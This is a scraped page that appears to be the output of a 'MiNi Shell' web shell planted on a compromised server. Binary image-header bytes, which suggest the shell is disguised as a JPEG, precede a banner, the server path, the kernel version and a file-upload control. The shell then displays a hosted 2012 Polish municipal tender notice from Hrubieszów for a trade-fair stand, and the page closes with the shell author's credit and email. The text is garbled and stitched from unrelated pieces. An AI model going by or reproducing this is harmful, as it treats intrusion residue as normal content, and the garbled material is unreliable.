JFIF ( %!1!%)+...383-7(-.+  -% &5/------------------------------------------------";!1AQ"aq2#3BRrb*!1"AQa2q#B ?yRd&vGlJwZvK)YrxB#j]ZAT^dpt{[wkWSԋ*QayBbm*&0<|0pfŷM`̬ ^.qR𽬷^EYTFíw<-.j)M-/s yqT'&FKz-([lև<G$wm2*e Z(Y-FVen櫧lҠDwүH4FX1 VsIOqSBۡNzJKzJξcX%vZcFSuMٖ%B ִ##\[%yYꉅ !VĂ1َRI-NsZJLTAPמQ:y״g_g= m֯Ye+Hyje!EcݸࢮSo{׬*h g<@KI$W+W'_> lUs1,o*ʺE.U"N&CTu7_0VyH,q ,)H㲣5<t ;rhnz%ݓz+4 i۸)P6+F>0Tв`&i}Shn?ik܀՟ȧ@mUSLFηh_er i_qt]MYhq 9LaJpPןߘvꀡ\"z[VƬ¤*aZMo=WkpSp \QhMb˒YH=ܒ m`CJt 8oFp]>pP1F>n8(*aڈ.Y݉[iTع JM!x]ԶaJSWҼܩ`yQ`*kE#nNkZKwA_7~ ΁JЍ;-2qRxYk=Uր>Z qThv@.w c{#&@#l;D$kGGvz/7[P+i3nIl`nrbmQi%}rAVPT*SF`{'6RX46PԮp(3W҅U\a*77lq^rT$vs2MU %*ŧ+\uQXVH !4t*Hg"Z챮 JX+RVU+ތ]PiJT XI= iPO=Ia3[ uؙ&2Z@.*SZ (")s8Y/-Fh Oc=@HRlPYp!wr?-dugNLpB1yWHyoP\ѕрiHִ,ِ0aUL.Yy`LSۜ,HZz!JQiVMb{( tژ <)^Qi_`: }8ٱ9_.)a[kSr> ;wWU#M^#ivT܎liH1Qm`cU+!2ɒIX%ֳNړ;ZI$?b$(9f2ZKe㼭qU8I[ U)9!mh1^N0 f_;׆2HFF'4b! yBGH_jтp'?uibQ T#ѬSX5gޒSF64ScjwU`xI]sAM( 5ATH_+s 0^IB++h@_Yjsp0{U@G -:*} TނMH*֔2Q:o@ w5(߰ua+a ~w[3W(дPYrF1E)3XTmIFqT~z*Is*清Wɴa0Qj%{T.ޅ״cz6u6݁h;֦ 8d97ݴ+ޕxзsȁ&LIJT)R0}f }PJdp`_p)əg(ŕtZ 'ϸqU74iZ{=Mhd$L|*UUn &ͶpHYJۋj /@9X?NlܾHYxnuXږAƞ8j ໲݀pQ4;*3iMlZ6w ȵP Shr!ݔDT7/ҡϲigD>jKAX3jv+ ߧز #_=zTm¦>}Tց<|ag{E*ֳ%5zW.Hh~a%j"e4i=vױi8RzM75i֟fEu64\էeo00d H韧rȪz2eulH$tQ>eO$@B /?=#٤ǕPS/·.iP28s4vOuz3zT& >Z2[0+[#Fޑ]!((!>s`rje('|,),y@\pЖE??u˹yWV%8mJ iw:u=-2dTSuGL+m<*צ1as&5su\phƃ qYLֳ>Y(PKi;Uڕp ..!i,54$IUEGLXrUE6m UJC?%4AT]I]F>׹P9+ee"Aid!Wk|tDv/ODc/,o]i"HIHQ_n spv"b}}&I:pȟU-_)Ux$l:fژɕ(I,oxin8*G>ÌKG}Rڀ8Frajٷh !*za]lx%EVRGYZoWѮ昀BXr{[d,t Eq ]lj+ N})0B,e iqT{z+O B2eB89Cڃ9YkZySi@/(W)d^Ufji0cH!hm-wB7C۔֛X$Zo)EF3VZqm)!wUxM49< 3Y .qDfzm |&T"} {*ih&266U9* <_# 7Meiu^h--ZtLSb)DVZH*#5UiVP+aSRIª!p挤c5g#zt@ypH={ {#0d N)qWT kA<Ÿ)/RT8D14y b2^OW,&Bcc[iViVdִCJ'hRh( 1K4#V`pِTw<1{)XPr9Rc 4)Srgto\Yτ~ xd"jO:A!7􋈒+E0%{M'T^`r=E*L7Q]A{]A<5ˋ.}<9_K (QL9FЍsĮC9!rpi T0q!H \@ܩB>F6 4ۺ6΋04ϲ^#>/@tyB]*ĸp6&<џDP9ᗟatM'> b쪗wI!܁V^tN!6=FD܆9*? q6h8  {%WoHoN.l^}"1+uJ ;r& / IɓKH*ǹP-J3+9 25w5IdcWg0n}U@2 #0iv腳z/^ƃOR}IvV2j(tB1){S"B\ ih.IXbƶ:GnI F.^a?>~!k''T[ע93fHlNDH;;sg-@, JOs~Ss^H '"#t=^@'W~Ap'oTڭ{Fن̴1#'c>꜡?F颅B L,2~ת-s2`aHQm:F^j&~*Nūv+{sk$F~ؒ'#kNsٗ D9PqhhkctԷFIo4M=SgIu`F=#}Zi'cu!}+CZI7NuŤIe1XT xC۷hcc7 l?ziY䠩7:E>k0Vxypm?kKNGCΒœap{=i1<6=IOV#WY=SXCޢfxl4[Qe1 hX+^I< tzǟ;jA%n=q@j'JT|na$~BU9؂dzu)m%glwnXL`޹W`AH̸뢙gEu[,'%1pf?tJ Ζmc[\ZyJvn$Hl'<+5[b]v efsЁ ^. &2 yO/8+$ x+zs˧Cޘ'^e fA+ڭsOnĜz,FU%HU&h fGRN擥{N$k}92k`Gn8<ʮsdH01>b{ {+ [k_F@KpkqV~sdy%ϦwK`D!N}N#)x9nw@7y4*\ Η$sR\xts30`O<0m~%U˓5_m ôªs::kB֫.tpv쌷\R)3Vq>ٝj'r-(du @9s5`;iaqoErY${i .Z(Џs^!yCϾ˓JoKbQU{௫e.-r|XWլYkZe0AGluIɦvd7 q -jEfۭt4q +]td_+%A"zM2xlqnVdfU^QaDI?+Vi\ϙLG9r>Y {eHUqp )=sYkt,s1!r,l鄛u#I$-֐2A=A\J]&gXƛ<ns_Q(8˗#)4qY~$'3"'UYcIv s.KO!{, ($LI rDuL_߰ Ci't{2L;\ߵ7@HK.Z)4
Devil Killer Is Here MiNi Shell

MiNi SheLL

Current Path : /home/vmanager/www/common/web/tenders/20120829/

Linux 9dbcd5f6333d 5.15.0-102-generic #112-Ubuntu SMP Tue Mar 5 16:50:32 UTC 2024 x86_64
Upload File :
Current File : /home/vmanager/www/common/web/tenders/20120829/186579-N-2012.html

<p class="kh_header"><b>Hrubieszów: WYKONANIE STOISKA NA TARGI TURYSTYCZNE W RAMACH REALIZACJI PROJEKTU OD WIZJI DO NOWOCZESNEGO ZARZĄDZANIA PODREGIONEM GOTANIA</b><br>
<b>Numer ogłoszenia: 186579 - 2012; data zamieszczenia: 29.08.2012</b><br>
OGŁOSZENIE O ZAMÓWIENIU - usługi<br><br></p>

<p><b>Zamieszczanie ogłoszenia:</b> obowiązkowe.</p>
<p><b>Ogłoszenie dotyczy:</b> zamówienia publicznego.</p>

<p class="kh_title">SEKCJA I: ZAMAWIAJĄCY</p>

<p><b>I. 1) NAZWA I ADRES:</b> Gmina Miejska Hrubieszów , ul. mjr H. Dobrzańskiego "Hubala" 1, 22-500 Hrubieszów, woj. lubelskie, tel. 084 6962380 w. 54, faks 084 6962380.</p>
<ul class="kh_indent_1">
<li><b>Adres strony internetowej zamawiającego:</b> www.miasto.hrubieszow.pl</li></ul>
<p><b>I. 2) RODZAJ ZAMAWIAJĄCEGO:</b> Administracja samorządowa.</p>

<p class="kh_title">SEKCJA II: PRZEDMIOT ZAMÓWIENIA</p>

<p><b>II.1) OKREŚLENIE PRZEDMIOTU ZAMÓWIENIA</b></p>
<p><b>II.1.1) Nazwa nadana zamówieniu przez zamawiającego:</b> WYKONANIE STOISKA NA TARGI TURYSTYCZNE W RAMACH REALIZACJI PROJEKTU OD WIZJI DO NOWOCZESNEGO ZARZĄDZANIA PODREGIONEM GOTANIA.</p>
<p><b>II.1.2) Rodzaj zamówienia:</b> usługi.</p>
<p><b>II.1.3) Określenie przedmiotu oraz wielkości lub zakresu zamówienia:</b> Przedmiotem zamówienia jest usługa wykonania stoiska na targi turystyczne w ramach realizacji projektu Od wizji do nowoczesnego zarządzania podregionem Gotania zgodnie z Projektem stoiska stanowiącym załącznik nr 7 do SIWZ. 

Dodatkowe wyposażenie stoiska:
1)	Pokrowiec  plandekowy zabezpieczający pokrycie dachu stoiska (strzechę słomianą lub trzcinową) przed niekorzystnymi warunkami atmosferycznymi. Pokrowiec o gramaturze min. 700 g/m2 wykonany w kolorze strzechy, zgodnie z warunkami i wymiarami określonymi w Projekcie stoiska, z uchwytami ułatwiającymi trwałe i wielokrotne mocowanie pokrowca na dachu stoiska.

2)	Telewizor
Rodzaj ekranu	LED
Przekątna ekranu [cal]	37 
Format obrazu	16/9 
Rozdzielczość	1920 x 1080 px
Kontrast dynamiczny	min. 500 000:1 
Jasność [cd/m2]	min. 400 
Zastosowane technologie	Full HD , DVB-T , DVB-C , MPEG-4 , MPEG-2 ,  EPG, DLNA , Audio return channel , WiFiReady, poprawa płynności obrazu - 400 HzMotion Rate, Pasywna technologia 3D, Konwersja obrazu 2D do 3D, USB , Component Video , CI+ Ready , Ethernet
Tuner	Zgodność z wymogami odbioru cyfrowej telewizji naziemnej, Telegazeta Hypertext, Odtwarzanie wideo: NTSC; PAL; SECAM, DVB-S2.
Inne	Odtwarzane formaty wideo: AVI; MKV; MPEG-1; MPEG-2; MPEG-4; WMV9/VC1, Odtwarzane formaty muzyki: AAC; MP3; WMA, odtwarzane formaty obrazów: JPEG, obsługa klawiatury i myszy USB, przeglądarka multimedialna DLNA; przeglądarka multimedialna USB, SMART TV; otwieranie przeglądarki internetowej; aplikacje internetowe, nagrywanie USB, Certyfikat DLNA 1.5, Aktualizowanie oprogramowania przez USB; aktualizacja oprogramowania sprzętowego w internecie.
Nagłośnienie	Stereo, uprzestrzennienie dźwięku, automatyczna regulacja głośności, głośniki min. 2x10W
Złącza	HDMI x 4, Wejścia Euro, Wyjście słuchawkowe, Antenowe, 3 x USB, Cyfrowe wyjście audio optyczne, Wejście PC VGA + wejście audio L/P
Konstrukcja	Obrotowa podstawa, Montaż ścienny zgodny z uchwytem ściennym: 200 x 200 mm, waga nie więcej niż 11 kg bez podstawy oraz nie więcej niż13kg z podstawą
Szerokość	Nie więcej niż 87 cm
Załączone wyposażenie	Pilot, bezprzewodowa karta WIFI,  kamera internetowa, Okulary 3D x 2 (pasywne), wieszak umożliwiający zamontowanie telewizora na stoisku zgodnie z projektem stoiska
Gwarancja	24 miesiące 


3)	 Notebook
Ekran	15.6 calowy wyświetlacz LED, rozdzielczość 1920 x 1080px	 
Chipset	Obsługujący zaoferowany procesor	 
Procesor	Procesor dwurdzeniowy o architekturze x86, dedykowany do komputerów przenośnych, energooszczędny i osiągający minimum 2300 pkt. w teście PassMark PC Mark, wg wyniku opublikowanego na stronie: http://www.cpubenchmark.net/cpu_list.php
 
Pamięć RAM	min.6 GB DDR3	 
Dysk twardy	Zamontowane 2 dyski jednocześnie
- dysk 1: minimum 500GB (talerzowy HDD) 
-dysk 2: minimum 32GB SSD	 
Karta graficzna	Karta graficzna 3D  z własną pamięcią min. 512 MB	 
Audio	Zintegrowana karta dźwiękowa, wbudowane głośniki stereo, wbudowany mikrofon	 
Komunikacja	-karta sieciowa 10/100/1000 - RJ 45 ,
-karta sieci bezprzewodowej  802.11 b/g/n 	 
Napęd optyczny	 Nagrywarka CD/DVD z możliwością nagrywania płyt: DC, CD-RW, DVD-R, DVD+R, DVD-RW, DVD+RW, DVD DL oraz możliwością odtwarzania Blu-Ray	 
Porty/złącza	1 x HDMI
min 3 x USB 2.0
Gniazdo Express Card 1x34 mm
Wbudowany czytnik kart pamięci	 
System operacyjny	Windows 7 Home/Pro OEM PL 64-bit, lub równoważny.
Parametry równoważności :
- Pełna integracja z domeną Windows opartą na serwerach Windows 2008 w zakresie autoryzacji w środowisku Zamawiającego;
- Zarządzanie komputerami poprzez Zasady Grup (GPO), WMI;	 
Dodatkowe oprogramowanie	MS-Office 2010 dla użytkowników domowych i małych firm PKC lub równoważny	 
Kamera internetowa	Wbudowana  min. rozdzielczość 1280 × 720 px	 
Inne wymagania	Podświetlana klawiatura, torba producenta, mysz bezprzewodowa	
Waga	Waga max 4 kg	 
Gwarancja	24 miesiące	

4)	Urządzenie wielofunkcyjne
Typ	wielofunkcyjne, laserowe, kolorowe
Format	max A4 
Drukowanie z USB	tak 
Drukowanie zdjęć	tak 
Wyświetlacz	tak 
WIFI	tak 
Ethernet	tak 
Szybkość druku w czerni	16 str./min lub więcej
Szybkość druku w kolorze	4 str./min lub więcej
Rozdzielczość wydruku	min. 600 x 600 dpi
Rozdzielczość skanowania	min. 1200 x 1200 dpi
Funkcje	Drukarka , ksero, skaner; z podajnikiem ADF
Waga	nie więcej niż 18 kg
Gwarancja	24 miesiące 

5)	drewniany wieszak ścienny z 4 podwójnymi metalowymi uchwytami na ubrania: 1 szt. 
szerokość maksymalnie: 100 cm
6)	ekspres ciśnieniowy do kawy: 1 szt.
Minimalne parametry:
Typ ekspresu: automatyczny
Ciśnienie: 15 barów
Moc: 1400 W
Stosowanie   kawy: ziarnista, mielona
Dysza do spieniania mleka z regulacją emisji pary
Wbudowany młynek  
Pojemność zbiornika na wodę:  1,8 litra 
Pojemność zbiornika na kawę: 250 g 
Sterowanie  elektroniczne 
Kolor: srebrny
Funkcje dodatkowe: spienianie mleka, automatyczne płukanie po każdym parzeniu kawy, automatyczne płukanie po każdym włączeniu urządzenia, automatyczny program czyszczenia i odkamieniania, funkcja samooczyszczania, funkcja odkamieniania, funkcja gorącej wody, oświetlenie filiżanek, szybki start, temperatura kawy
Wyposażenie: łyżeczka do kawy mielonej, odkamieniacz, tabletki do czyszczenia, instrukcja obsługi w języku polskim
Gwarancja: 24 miesiące  

7)	chłodziarko-zamrażarka: 1 szt.
Minimalne parametry:
Klasa energetyczna: A+
Pojemność netto chłodziarki:152 litry
Pojemność netto zamrażarki: 42 litry
Zdolność zamrażania 6 kg/24h 
3 lub 4 półki z regulacją wysokości, 1 lub 2 szuflady na warzywa, 3 lub 4 balkoniki na drzwiach, oświetlenie wnętrza
Sposób odszraniania (rozmrażania) chłodziarki automatyczny
Wymiary maksymalne (wys.x szer.x gł.): 123 x 55 x 62,9 cm
Kolor  stal nierdzewna + szary
Gwarancja: 24 miesiące 
                  
8)	czajnik elektryczny: 1 szt.
Minimalne parametry:
Pojemność 1,7 litra
Moc 2200 W
Filtr antyosadowy 
wskaźnik poziomu wody 
automatyczne wyłączenie po zagotowaniu
Kolor  srebrny
Gwarancja: 24 miesiące 

9)	szafka z 2 półkami zamykana na klucz: 1 szt.
wymiary: wys. 80cm, szer: 80 cm głęb: 30 cm
materiał: drewno sosnowe lub inne

10)	lustro w drewnianej ramie: 1 szt.
kolor ramy: brąz
wymiary: wys. 150cm, szer. 80 cm

11)	filiżanki ceramiczne do kawy z talerzykami: 12 szt.
pojemność: 200ml
kolor: biały

12)	łyżeczki do kawy - 12 szt.
wykonanie: najwyższej jakości stal nierdzewna 18/10, chromowo-niklowa 
wykończenie: polerowane na wysoki lustrzany połysk i satynowane
mycie w zmywarce: tak 


Wraz ze stoiskiem wykonawca dostarczy przyczepę dwuosiową z hamulcem (do przewozu stoiska)
Minimalne parametry przyczepy:
Długość 350 cm
Szerokość 150 cm
Wysokość burty 35 cm
Wysokość plandeki  140 cm
Koła 175/14C
Dopuszczalna masa całkowita (DMC) 3000 kg
Układ hamujący 2600 kg
Rama przyczepy: stalowa, wykonana z wytrzymałych profili z ochroną antykorozyjną (ocynkowana ogniowo).
Podłoga: sklejka antypoślizgowa, wodoodporna. 
Burty przyczepy: wysokotłoczona blacha 

Przyczepa winna spełniać wymogi określone przepisami ruchu drogowego i posiadać dokumenty niezbędne do jej rejestracji (świadectwa homologacji dla przyczepy).

Na plandece przyczepy, zgodnie  z wytycznymi dla beneficjentów w zakresie Informacji i Promocji w ramach Szwajcarsko-Polskiego Programu Współpracy należy umieścić  logotyp SWISS CONTRIBUTION, logotyp Bundeslogo,  logotyp Gotanii oraz informację o współfinansowaniu
- w języku polskim Projekt współfinansowany przez Szwajcarię w ramach szwajcarskiegoprogramuwspółpracy z nowymi krajami członkowskimi Unii Europejskiej.
 
-w języku angielskim: Project supported by a grant from Switzerland through the Swiss Contributiontotheenlarged European Union.

Dodatkowo na dwóch bocznych ścianach plandeki zostanie zamieszczony nadruk: 
- hasło Witajcie w Gotanii; 
- adres strony www.gotania.pl
-grafika (fotografiarepliki chaty gockiej lub innaudostępniona przez Zamawiającego). Wielkość obrazu 750x500 mm.

Dodatkowe wyposażenie przyczepy:
1)	skrzynka narzędziowa z zestawem narzędzi,
2)	 klucze do kół
3)	 koło zapasowe
4)	 koło podporowe
5)	 gaśnica
6)	 kliny do koła
7)	 zabezpieczenie antykradzieżowe
8)	 trójkąt ostrzegawczy
Wykonawca dostarczy przedmiot zamówienia na własny koszt do siedziby Zamawiającego - Urząd Miasta Hrubieszów, ul. mjr H. Dobrzańskiego HUBALA 1, 22-500 Hrubieszów.
Odbiór przedmiotu umowy zostanie potwierdzony protokołem zdawczo - odbiorczym, który będzie stanowił podstawę do wystawienia faktury przez Wykonawcę.
Gwarancja: 12 miesięcy

Wykonawca udzieli 5 letniej gwarancji na wykonanie oraz materiały, z których zostanie wykonane stoisko w dniu bezusterkowego odbioru przedmiotu zamówienia, co znajdzie  potwierdzenie w protokole odbioru usługi.
Wykonawca dostarczy skrzynkę narzędziowa z zestawem narzędzi, niezbędnym do montażu i demontażu stoiska.
Wykonawca przeprowadzi szkolenie całkowitego montażu i demontażu stoiska dla 4 osób wyznaczonych przez Zamawiającego, w miejscu wyznaczonym przez Zamawiającego w dniu dostawy stoiska.

Przy wykonywaniu zamówienia  należy stosować materiały i urządzenia dopuszczone do obrotu, posiadające stosowne aprobaty, certyfikaty i atesty.

Przedmiot zamówienia musi być fabrycznie nowy i spełniający wymagania norm technicznych stosowanych w Polsce (PN) oraz norm europejskich. Wykonawca załączy atesty lub świadectwa potwierdzające spełnienie parametrów.

Stoisko na targi turystyczne oraz pozostałe elementy przedmiotu zamówienia powinny być oznakowane zgodnie  z wytycznymi dla beneficjentów w zakresie Informacji i Promocji w ramach Szwajcarsko-Polskiego Programu Współpracy.

W zakres zamówienia wchodzą wszystkie prace, usługi i materiały konieczne do wykonania zamówienia zgodnie z wymaganiami SIWZ, jak również pozostałe czynności, opłaty i koszty niezbędne dla prawidłowego wykonania przedmiotu zamówienia                    (np. opłaty, podatki, narzuty, cła itp.). 

Jeżeli w SIWZ przy opisie przedmiotu zamówienia wskazana została nazwa producenta, znak towarowy, patent lub pochodzenie w stosunku do określonych materiałów, urządzeń, itp. Zamawiający wymaga, aby traktować takie wskazanie jako przykładowe i dopuszcza zastosowanie przy realizacji zamówienia materiałów, urządzeń, itp. równoważnych, o parametrach nie gorszych niż wskazane..</p>
<p><b>II.1.4) Czy przewiduje się udzielenie zamówień uzupełniających:</b> nie.</p>

<p><b>II.1.5) Wspólny Słownik Zamówień (CPV):</b> 79.95.60.00-0, 39.71.11.00-0, 39.71.13.10-5, 30.23.60.00-2, 32.32.46.00-6, 34.22.33.00-9.</p>
<p><b>II.1.6) Czy dopuszcza się złożenie oferty częściowej:</b> nie.</p>
<p><b>II.1.7) Czy dopuszcza się złożenie oferty wariantowej:</b> nie.</p><br>
<p><b>II.2) CZAS TRWANIA ZAMÓWIENIA LUB TERMIN WYKONANIA:</b> Zakończenie: 16.10.2012.</p>

<p class="kh_title">SEKCJA III: INFORMACJE O CHARAKTERZE PRAWNYM, EKONOMICZNYM, FINANSOWYM I TECHNICZNYM</p>

<p><b>III.1) WADIUM</b></p>
<p><b>Informacja na temat wadium:</b> Od Wykonawców składających oferty na: WYKONANIE STOISKA NA TARGI TURYSTYCZNE W RAMACH REALIZACJI PROJEKTU OD WIZJI DO NOWOCZESNEGO ZARZĄDZANIA PODREGIONEM GOTANIA wymaga się wniesienia wadium w kwocie 2.000,00 PLN (słownie: dwa tysiące zł 00/100).
Dowód wniesienia wadium - pod rygorem wykluczenia z postępowania (podst. pr. art. 24 ust. 2 pkt. 2 ustawy Prawo zamówień publicznych) należy dołączyć do dokumentacji przedstawionej wraz z oferta. Wadium wnosi się przed upływem terminu składania ofert,                 tj. do dnia 6 września 2012 r. do godz. 13:00. Wadium może być wnoszone w jednej lub kilku następujących formach:
a) pieniądzu; Wadium uznaje się za wniesione w momencie wpłynięcia na konto Zamawiającego.
b) poręczeniach bankowych lub poręczeniach Spółdzielczej Kasy Oszczędnościowo Kredytowej, z tym, że poręczenie kasy jest zawsze poręczeniem pieniężnym;
c) gwarancjach bankowych;
d) gwarancjach ubezpieczeniowych;
e) poręczeniach udzielanych przez podmioty, o których mowa w art. 6B ust. 5 pkt. 2 ustawy z dnia 9.11.2000 r. o utworzeniu Polskiej Agencji Rozwoju Przedsiębiorczości (Dz. U. Nr 109, poz. 1158, z późn. zm.)
Wadium wnoszone w pieniądzu wpłaca się na następujący rachunek bankowy:
PEKAO S.A. I O/Hrubieszów Nr 66 12 40 28 29 1111 0000 4027 0267 z dopiskiem Wadium do przetargu  Nr ZP.271.14.2012
Zamawiający zwraca niezwłocznie wadium, jeżeli:
1) Zamawiający zwraca wadium wszystkim wykonawcom niezwłocznie po wyborze oferty najkorzystniejszej lub unieważnieniu postępowania, z wyjątkiem wykonawcy, którego oferta została wybrana jako najkorzystniejsza, z zastrzeżeniem art. 46 ust. 4a ustawy,
2) Wykonawcy, którego oferta została wybrana jako najkorzystniejsza, Zamawiający zwraca wadium niezwłocznie po zawarciu umowy w sprawie zamówienia publicznego,
3) Zamawiający zwraca niezwłocznie wadium, na wniosek wykonawcy, który wycofał ofertę przed upływem terminu składania ofert,
4) Zamawiający żąda ponownego wniesienia wadium przez wykonawcę, któremu zwrócono wadium na podstawie art. 46 ust. 1 ustawy, jeżeli w wyniku ostatecznego rozstrzygnięcia odwołania jego oferta została wybrana jako najkorzystniejsza. Wykonawca wnosi wadium w terminie określonym przez zamawiającego,
5) Jeżeli wadium wniesiono w pieniądzu, Zamawiający zwraca je wraz z odsetkami wynikającymi z umowy rachunku bankowego, na którym było ono przechowywane, pomniejszone o koszty prowadzenia rachunku bankowego oraz prowizji bankowej za przelew pieniędzy na rachunek bankowy wskazany przez wykonawcę,
6) Zamawiający zatrzymuje wadium wraz z odsetkami, jeżeli Wykonawca, którego oferta została wybrana:
a) odmówił podpisania umowy w sprawie zamówienia publicznego na warunkach określonych w ofercie;
b) zawarcie umowy w sprawie zamówienia publicznego stało się niemożliwe z przyczyn leżących po stronie Wykonawcy;
c) jeżeli Wykonawca w odpowiedzi na wezwanie, o którym mowa w art. 26. ust.3 ustawy, nie złożył dokumentów lub oświadczeń, których mowa w art. 25 ust. 1 lub pełnomocnictw, chyba że udowodni, że wynika to z przyczyn nie leżących po jego stronie. Złożone na wezwanie Zamawiającego oświadczenia i dokumenty powinny potwierdzać spełnianie przez wykonawcę warunków udziału w postępowaniu określonych przez Zamawiającego nie później niż w dniu, w którym upłynął termin składania ofert.
7) Złożenie przez Wykonawcę, którego oferta została odrzucona lub wykluczonego z postępowania, wniosku o zwrot wadium jest równoznaczne z zrzeczeniem się przez Wykonawcę prawa do wniesienia odwołania.</p>
<p><b>III.2) ZALICZKI</b></p>
<ul class="kh_indent_1"><li><b>Czy przewiduje się udzielenie zaliczek na poczet wykonania zamówienia:</b> nie</li></ul>
<p><b>III.3) WARUNKI UDZIAŁU W POSTĘPOWANIU ORAZ OPIS SPOSOBU DOKONYWANIA OCENY SPEŁNIANIA TYCH WARUNKÓW</b></p>
<ul class="kh_indent_1">
<li><p><b>III. 3.1) Uprawnienia do wykonywania określonej działalności lub czynności, jeżeli przepisy prawa nakładają obowiązek ich posiadania</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>Zamawiający nie wyznacza szczegółowego warunku w tym zakresie</p>
</li></ul></li><li><p><b>III.3.2) Wiedza i doświadczenie</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>W okresie ostatnich trzech lat przed wszczęciem postępowania o udzielenie zamówienia, jeżeli okres prowadzenia działalności jest krótszy - w tym okresie zostały wykonane a w przypadku okresowych lub ciągłych są wykonywane należycie co najmniej jedną usługę odpowiadającą swoim charakterem przedmiotowi zamówienia o wartości min. 15 000 PLN brutto każda. Zamawiający uzna za odpowiadającą swoim charakterem usługę stanowiącą przedmiot zamówienia polegającą na wykonaniu stoiska targowego - zgodnie z załącznikiem nr 6 do SIWZ</p>
</li></ul></li><li><p><b>III.3.3) Potencjał techniczny</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>Zamawiający nie wyznacza szczegółowego warunku w tym zakresie</p>
</li></ul></li><li><p><b>III.3.4) Osoby zdolne do wykonania zamówienia</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>Zamawiający nie wyznacza szczegółowego warunku w tym zakresie</p>
</li></ul></li><li><p><b>III.3.5) Sytuacja ekonomiczna i finansowa</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>Zamawiający nie wyznacza szczegółowego warunku w tym zakresie</p>
</li></ul></li></ul>
<p><b>III.4) INFORMACJA O OŚWIADCZENIACH LUB DOKUMENTACH, JAKIE MAJĄ DOSTARCZYĆ WYKONAWCY W CELU POTWIERDZENIA SPEŁNIANIA WARUNKÓW UDZIAŁU W POSTĘPOWANIU ORAZ NIEPODLEGANIA WYKLUCZENIU NA PODSTAWIE ART. 24 UST. 1 USTAWY</b></p>
<ul class="kh_indent_1"><li>
<p><b>III.4.1) W zakresie wykazania spełniania przez wykonawcę warunków, o których mowa w art. 22 ust. 1 ustawy, oprócz oświadczenia o spełnieniu warunków udziału w postępowaniu, należy przedłożyć:</b></p>
</li>

<li><p><b>III.4.2) W zakresie potwierdzenia niepodlegania wykluczeniu na podstawie art. 24 ust. 1 ustawy, należy przedłożyć:</b></p>

<ul style="text-align: justify; margin-right: 20px; list-style: disc"><li style="margin-bottom: 12px;">oświadczenie o braku podstaw do wykluczenia</li>

</ul></li>
<li>
</li>
</ul>
<p class="bold">III.6) INNE DOKUMENTY</p>
<p class="bold">Inne dokumenty niewymienione w pkt III.4) albo w pkt III.5)</p>
<p>1.	Formularz oferty, stanowiący załącznik nr 1  do  SIWZ
2.	W przypadku udziału podwykonawców - załącznik nr 3
3.	Pisemne zobowiązanie innych  podmiotów do oddania wykonawcy  do dyspozycji niezbędnych zasobów na okres korzystania z nich przy wykonaniu zamówienia, jeżeli dotyczy</p>
<p><b>III.7) Czy ogranicza się możliwość ubiegania się o zamówienie publiczne tylko dla wykonawców, u których ponad 50 % pracowników stanowią osoby niepełnosprawne: </b>nie</p>


<p class="kh_title">SEKCJA IV: PROCEDURA</p>
<p><b>IV.1) TRYB UDZIELENIA ZAMÓWIENIA</b></p>
<p><b>IV.1.1) Tryb udzielenia zamówienia:</b> przetarg nieograniczony.</p>

<p><b>IV.2) KRYTERIA OCENY OFERT</b></p>
<p><b>IV.2.1) Kryteria oceny ofert: </b>najniższa cena.</p>
<p><b>IV.2.2) Czy przeprowadzona będzie aukcja elektroniczna:</b> nie.</p>
<p><b>IV.3) ZMIANA UMOWY</b></p>
<p><b>Czy przewiduje się istotne zmiany postanowień zawartej umowy w stosunku do treści oferty, na podstawie której dokonano wyboru wykonawcy: </b>tak</p>
<p><b>Dopuszczalne zmiany postanowień umowy oraz określenie warunków zmian</b></p>
<p>1.	Dopuszcza się wszelkie zmiany nieistotne rozumiane w ten sposób, że wiedza o ich wprowadzeniu na etapie postępowania o zamówienie nie wpłynęłaby na krąg podmiotów ubiegających się o zamówienie ani na wynik postępowania o udzielenie zamówienia  publicznego.
2.	Zamawiający przewiduje możliwość zmian postanowień zawartej umowy, w przypadku wystąpienia co najmniej jednej z okoliczności wymienionych poniżej, z uwzględnieniem podawanych warunków ich wprowadzenia:
1)	termin realizacji: w przypadku działania siły wyższej (np. klęski żywiołowe, strajki generalne lub lokalne), mającej bezpośredni wpływ na terminowość wykonania usług, 
2)	wynagrodzenie - w następstwie zmiany przepisów o podatku od towarów i usług (VAT),
3)	przedmiot umowy - jeżeli konieczność wprowadzenia zmian jest skutkiem zmiany przepisów prawa lub wynika z okoliczności, których strony umowy nie mogły przewidzieć w momencie składania ofert, 
3.	Nie stanowi zmiany umowy:
1)	zmiana danych związanych z obsługą administracyjno - organizacyjną umowy,
2)	zmiana danych teleadresowych, osób reprezentujących strony lub oznaczenia stron umowy - wynikających ze zmiany stanu faktycznego albo prawnego</p>
<p><b>IV.4) INFORMACJE ADMINISTRACYJNE</b></p>
<p><b>IV.4.1)</b>&nbsp;<b>Adres strony internetowej, na której jest dostępna specyfikacja istotnych warunków zamówienia:</b> www.bip.miasto.hrubieszow.pl<br>
<b>Specyfikację istotnych warunków zamówienia można uzyskać pod adresem:</b> Urząd Miasta w Hrubieszowie
Biuro Projektu SPPW 
ul. mjr H. Dobrzańskiego HUBALA 1
22-500 Hrubieszów.</p>
<p><b>IV.4.4) Termin składania wniosków o dopuszczenie do udziału w postępowaniu lub ofert:</b> 06.09.2012 godzina 13:00, miejsce: Gmina Miejska Hrubieszów (sekretariat)
ul. mjr H. Dobrzańskiego Hubala 1
22-500 Hrubieszów.</p>
<p><b>IV.4.5) Termin związania ofertą:</b> okres w dniach: 30 (od ostatecznego terminu składania ofert).</p>




<p><b>IV.4.16) Informacje dodatkowe, w tym dotyczące finansowania projektu/programu ze środków Unii Europejskiej:</b> Projekt współfinansowany przez Szwajcarię w ramach Szwajcarsko - Polskiego Programu Współpracy z nowymi krajami członkowskimi Unii Europejskiej.</p>
<p><b>IV.4.17) Czy przewiduje się unieważnienie postępowania o udzielenie zamówienia, w przypadku nieprzyznania środków pochodzących z budżetu Unii Europejskiej oraz niepodlegających zwrotowi środków z pomocy udzielonej przez państwa członkowskie Europejskiego Porozumienia o Wolnym Handlu (EFTA), które miały być przeznaczone na sfinansowanie całości lub części zamówienia: </b> nie</p>

Creat By MiNi SheLL
Email: jattceo@gmail.com